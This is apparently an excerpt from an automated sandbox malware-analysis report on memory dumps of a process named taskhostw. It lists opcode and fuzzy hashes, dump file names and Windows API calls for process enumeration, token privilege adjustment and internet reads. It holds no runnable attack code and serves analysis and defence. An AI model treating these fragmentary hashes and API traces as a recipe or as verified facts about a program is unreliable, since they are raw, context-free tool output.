                                                                  • Opcode ID: 9c0f58e3d5b909e2281adf4fb9c79b2e1ff28304abd67edd3616109de2051f1a
                                                                  • Instruction ID: 2abf296bb9d70a4082e394f0020963158155bce59786f2558bc786d8fa131e93
                                                                  • Opcode Fuzzy Hash: 9c0f58e3d5b909e2281adf4fb9c79b2e1ff28304abd67edd3616109de2051f1a
                                                                  • Instruction Fuzzy Hash: 17E08674920733DFCB205F65F909A4676E4EF09344B508439D88DD2250E774C4A0CB50
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: __itow__swprintf
                                                                  • String ID:
                                                                  • API String ID: 674341424-0
                                                                  • Opcode ID: 3aaad38bc9680bd309ab71f568fa4dd4e9a0c6b95244753d1c78f3977fd1c336
                                                                  • Instruction ID: 609a64f2b6abf01b50ca207fd620ddee48ee252a60219f633c9940baebc8ceba
                                                                  • Opcode Fuzzy Hash: 3aaad38bc9680bd309ab71f568fa4dd4e9a0c6b95244753d1c78f3977fd1c336
                                                                  • Instruction Fuzzy Hash: F222AA726083119FCB24DF24C994B6FB7EAAF84704F00492DE99A97290DF75E944CF92
                                                                  APIs
                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 0022EF51
                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0022EF5F
                                                                    • Part of subcall function 001B7F41: _memmove.LIBCMT ref: 001B7F82
                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 0022F01F
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0022F02E
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                  • String ID:
                                                                  • API String ID: 2576544623-0
                                                                  • Opcode ID: 2ca81207f1bbeb7ed1a803e998b80208524e09127a9393fc02e306efd5b21557
                                                                  • Instruction ID: 3e324bb274fe0785be1e0cd1dd26d0dc875f82d9aed162a9e10e9e300a46cddd
                                                                  • Opcode Fuzzy Hash: 2ca81207f1bbeb7ed1a803e998b80208524e09127a9393fc02e306efd5b21557
                                                                  • Instruction Fuzzy Hash: 34518E71508311AFD310EF20EC85EABB7E8FF94710F10492DF59597291EB70A908CB92
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: DdL$DdL$DdL$DdL
                                                                  • API String ID: 0-1563988167
                                                                  • Opcode ID: e7e71000bad2a2e74a63024352e9648c86786c9a6ef1205aee9a6705328a7e48
                                                                  • Instruction ID: 73db72f03a0689312812395b6b55c7dd2e5964f4ee8d15013b346f682a2ccc04
                                                                  • Opcode Fuzzy Hash: e7e71000bad2a2e74a63024352e9648c86786c9a6ef1205aee9a6705328a7e48
                                                                  • Instruction Fuzzy Hash: B2926975A00625CFCF24CF58C580AAAB7F2FF49314F6580AAED05AB351DB35E946CB84
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0020E93A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen
                                                                  • String ID: ($|
                                                                  • API String ID: 1659193697-1631851259
                                                                  • Opcode ID: 83b0980953ad905c906d2360b12f784c78e29aa08046b297dc3016f12f790a94
                                                                  • Instruction ID: a5293488953ac8f7fff80b8f21194cdc465f48763c32335f1fb1f50a37a52082
                                                                  • Opcode Fuzzy Hash: 83b0980953ad905c906d2360b12f784c78e29aa08046b297dc3016f12f790a94
                                                                  • Instruction Fuzzy Hash: 90322775A107059FCB28CF19C48196AB7F1FF48320B16C95EE49ADB3A2D770E991CB40
                                                                  APIs
                                                                  • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 002224F7
                                                                  • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 0022252E
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Internet$AvailableDataFileQueryRead
                                                                  • String ID:
                                                                  • API String ID: 599397726-0
                                                                  • Opcode ID: 26717efdffefc3174513c4fc1f62f0bab82f67383a30fe77b005e260298f866f
                                                                  • Instruction ID: 94503ea65de372083a5a1441106253451b4bf7de9157c4ae59d73a07f5d98c01
                                                                  • Opcode Fuzzy Hash: 26717efdffefc3174513c4fc1f62f0bab82f67383a30fe77b005e260298f866f
                                                                  • Instruction Fuzzy Hash: 9B41F87192021AFFDB24DED5EC95EBBB7BCEB40314F50802AF601A7240D7B29E68D650
                                                                  APIs
                                                                    • Part of subcall function 001D0F36: std::exception::exception.LIBCMT ref: 001D0F6C
                                                                    • Part of subcall function 001D0F36: __CxxThrowException@8.LIBCMT ref: 001D0F81
                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00208AED
                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00208B1A
                                                                  • GetLastError.KERNEL32 ref: 00208B27
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                  • String ID:
                                                                  • API String ID: 1922334811-0
                                                                  • Opcode ID: d24ba0ebc86650e59a4cef772162789a0750fc510ca7aaf1a87a5c2ed492fcc6
                                                                  • Instruction ID: a83241493598f76fba7add1df43fc0bddfd975b72a817b5cfc7e859c91fdc7f4
                                                                  • Opcode Fuzzy Hash: d24ba0ebc86650e59a4cef772162789a0750fc510ca7aaf1a87a5c2ed492fcc6
                                                                  • Instruction Fuzzy Hash: C811C1B1924305AFD728DF54EC85D2BB7BCFB44314B20816EF48693251EB30EC50CA60
                                                                  APIs
                                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00214A31
                                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00214A48
                                                                  • FreeSid.ADVAPI32(?), ref: 00214A58
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                  • String ID:
                                                                  • API String ID: 3429775523-0
                                                                  • Opcode ID: e7e3e83419e6262c48adfa2f76f217082ccc17a0117ad50877ea9d0ca137cdbe
                                                                  • Instruction ID: 63e90c5f9c9fb5de36b9649852031e13fc6f47790d6342d16423b987dfd95526
                                                                  • Opcode Fuzzy Hash: e7e3e83419e6262c48adfa2f76f217082ccc17a0117ad50877ea9d0ca137cdbe
                                                                  • Instruction Fuzzy Hash: B4F04975E5130DBFDF04DFF4ED89AAEBBBCEF08201F0044A9A905E2281E6706A448B50
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 408b997f840a905ffe582337a4dc60593b013503fe809690cd34f803e4a129d4
                                                                  • Instruction ID: be2fd76c5db032102e4f1722db03220d9ed21a379134a3249cc24d9ebf98cd12
                                                                  • Opcode Fuzzy Hash: 408b997f840a905ffe582337a4dc60593b013503fe809690cd34f803e4a129d4
                                                                  • Instruction Fuzzy Hash: 1812C571540218AFEB298F64CC88FBEBBB8EF49314F104569F916EA1E0EF709945CB54
                                                                  APIs
                                                                  • __time64.LIBCMT ref: 02AB7D44
                                                                    • Part of subcall function 02A7477A: __aulldiv.LIBCMT ref: 02A747A3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldiv__time64
                                                                  • String ID: 0eL
                                                                  • API String ID: 325419493-3167399643
                                                                  • Opcode ID: f963c45ab757e4befe58fcd85888ccc5a82c6e31b363806115eba6e2896c8fcc
                                                                  • Instruction ID: 8e2b8f386f590a481930ed596e8d041027a2d388e3840ede9cfd08ee32f9b6aa
                                                                  • Opcode Fuzzy Hash: f963c45ab757e4befe58fcd85888ccc5a82c6e31b363806115eba6e2896c8fcc
                                                                  • Instruction Fuzzy Hash: 3321A232625610CBC729CF29D880B92B3E5EF95311F298E6CD1E6CB2D0CA75A905CF54
                                                                  APIs
                                                                  • __time64.LIBCMT ref: 00218944
                                                                    • Part of subcall function 001D537A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00219017,00000000,?,?,?,?,002191C8,00000000,?), ref: 001D5383
                                                                    • Part of subcall function 001D537A: __aulldiv.LIBCMT ref: 001D53A3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Time$FileSystem__aulldiv__time64
                                                                  • String ID: 0e'
                                                                  • API String ID: 2893107130-1722422795
                                                                  • Opcode ID: 4726f6faa0de4a6a1080f9d206779419ff5e73ada27cc643f002ed998e9645d3
                                                                  • Instruction ID: f3e2d8bf2afcb77fc86f5b309965a39132c2907261aeb6e9dc8f4dab2b4d0bc4
                                                                  • Opcode Fuzzy Hash: 4726f6faa0de4a6a1080f9d206779419ff5e73ada27cc643f002ed998e9645d3
                                                                  • Instruction Fuzzy Hash: F321E432635910CBC729CF25D485A92B3E1EBA5310F688E2CE1E9CB2C0CA34B945DB50
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b8db5ed20137469ab6f3201b90b91d7aa03eceda89041ca9ae98bc74595c0765
                                                                  • Instruction ID: 687fe276e8c9a4f929467036821835f8d5bf690d334e684ba761170038f2c39f
                                                                  • Opcode Fuzzy Hash: b8db5ed20137469ab6f3201b90b91d7aa03eceda89041ca9ae98bc74595c0765
                                                                  • Instruction Fuzzy Hash: 27228BB5900626DFDB24DF54C480BABB7F1FF08314F148169EC5AAB350EB34A985CB91
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d9451abf9eef75dad12a76c2c3a7619f9005050fb28ee5a7177e19510ed6fec6
                                                                  • Instruction ID: 49eeb2ef3f10de05e7d5bbc201a5f50f7d17c0d13b132f2db7150c737c1fad6b
                                                                  • Opcode Fuzzy Hash: d9451abf9eef75dad12a76c2c3a7619f9005050fb28ee5a7177e19510ed6fec6
                                                                  • Instruction Fuzzy Hash: 4622AC74A0021ADFDB24DF58C490AFEB7F1FF18310F24816AE956AB351E375A981CB91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 0DJ0EJ0FJpGJ$pGJ
                                                                  • API String ID: 0-2520054932
                                                                  • Opcode ID: 065cc444c4a8578116bc0902fafd9b31fb5deed04280f9b98aea2c83bf6d80fb
                                                                  • Instruction ID: 3786b216f72ed042b82be08a4c0815ad56b759bb3d411852fbb105244ea0f256
                                                                  • Opcode Fuzzy Hash: 065cc444c4a8578116bc0902fafd9b31fb5deed04280f9b98aea2c83bf6d80fb
                                                                  • Instruction Fuzzy Hash: AB726C75E00219DBDB24CF59C8947BEB7B5FF48714F14816AE919EB280EB349A81CF90
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ($|
                                                                  • API String ID: 0-1631851259
                                                                  • Opcode ID: 59fbd3350cf74ca42bab3bb6170bdc161b43785311ed61997312106b8e649722
                                                                  • Instruction ID: aaca92d1eb8629db9846f6e6d1496dc272633177fe3baec40ce11687ddb94700
                                                                  • Opcode Fuzzy Hash: 59fbd3350cf74ca42bab3bb6170bdc161b43785311ed61997312106b8e649722
                                                                  • Instruction Fuzzy Hash: A9322575A00B059FCB28DF19C590A6AB7F1FF48310B15C4AEE49ADB7A1EB70E941CB44
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0021C787
                                                                  • FindClose.KERNEL32(00000000), ref: 0021C7B7
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Find$CloseFileFirst
                                                                  • String ID:
                                                                  • API String ID: 2295610775-0
                                                                  • Opcode ID: 990bdc8b6151cd5c6f92cda95baac53fcf87d9c9d9ce64a89dac239b3c1d0896
                                                                  • Instruction ID: 860dde4fd179d033d2e6b6fa6a83220dd87eb23ff1a189dff789ddf1bb896401
                                                                  • Opcode Fuzzy Hash: 990bdc8b6151cd5c6f92cda95baac53fcf87d9c9d9ce64a89dac239b3c1d0896
                                                                  • Instruction Fuzzy Hash: 3D11AD366102109FD710EF29D849A6AF7E8FF94324F00855EF9AAD72A1DB70AC11CF81
                                                                  APIs
                                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0022957D,?,0023FB84,?), ref: 0021A121
                                                                  • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0022957D,?,0023FB84,?), ref: 0021A133
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFormatLastMessage
                                                                  • String ID:
                                                                  • API String ID: 3479602957-0
                                                                  • Opcode ID: e2f29f4726f40a948bf3212d1f0b349b89530d54a6f3f2c994a357bf00ed80d6
                                                                  • Instruction ID: 43acaf227628045f4a035b0ab90dbeda0f4deb9d22f2bc7aac0e19050539944a
                                                                  • Opcode Fuzzy Hash: e2f29f4726f40a948bf3212d1f0b349b89530d54a6f3f2c994a357bf00ed80d6
                                                                  • Instruction Fuzzy Hash: B3F0E23551522DBBDB109FA4DC48FEA73ACFF08361F004166F809D3180D7309940CBA1
                                                                  APIs
                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00208631), ref: 00208508
                                                                  • CloseHandle.KERNEL32(?), ref: 0020851A
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                                  • String ID:
                                                                  • API String ID: 81990902-0
                                                                  • Opcode ID: b268d0a96b47ae13dd4fc7dd78adfa8954f8401479c1b90f213d02df90e2dadb
                                                                  • Instruction ID: 84b11a4084fe6eb271100d20316a5093fd330cd01bf6f58d1a7431a393a95798
                                                                  • Opcode Fuzzy Hash: b268d0a96b47ae13dd4fc7dd78adfa8954f8401479c1b90f213d02df90e2dadb
                                                                  • Instruction Fuzzy Hash: 72E08631014600AFE7262F24FC08E777BE9EF04310B20842EF4D581470DB219CA0DB50
                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 001DA2DA
                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 001DA2E3
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled
                                                                  • String ID:
                                                                  • API String ID: 3192549508-0
                                                                  • Opcode ID: bc4d9e19205b1a0cd898645c49d5313279d1536f8a45808f852286ccfe04f680
                                                                  • Instruction ID: 44396f91d5fa32d6823516cdf86c969ec41858c13f078568a79e8274a7c8d37a
                                                                  • Opcode Fuzzy Hash: bc4d9e19205b1a0cd898645c49d5313279d1536f8a45808f852286ccfe04f680
                                                                  • Instruction Fuzzy Hash: 90B09231454248ABCA802B91FE0DB8A3F78EB45AA2F4040A0FE0D85060CB6254508A91
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
                                                                  • Instruction ID: 6eeba043bd1a5acc1175ca24f67385b51942a80f9f81a8a285ce779e1db36a2d
                                                                  • Opcode Fuzzy Hash: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
                                                                  • Instruction Fuzzy Hash: 8532F222D29F014DD7239634DD72336A299AFB72C8F15D737E819B5DA6EF28D4834208
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
                                                                  • Instruction ID: b27f23c6a369269e906d96487ae9701df4446e7436d3ab53071f18d4af235b91
                                                                  • Opcode Fuzzy Hash: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
                                                                  • Instruction Fuzzy Hash: 61B10231D2AF504DD723A6398835336BA5CAFBB2C5F51D72BFC2A70D22EB2185934181
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
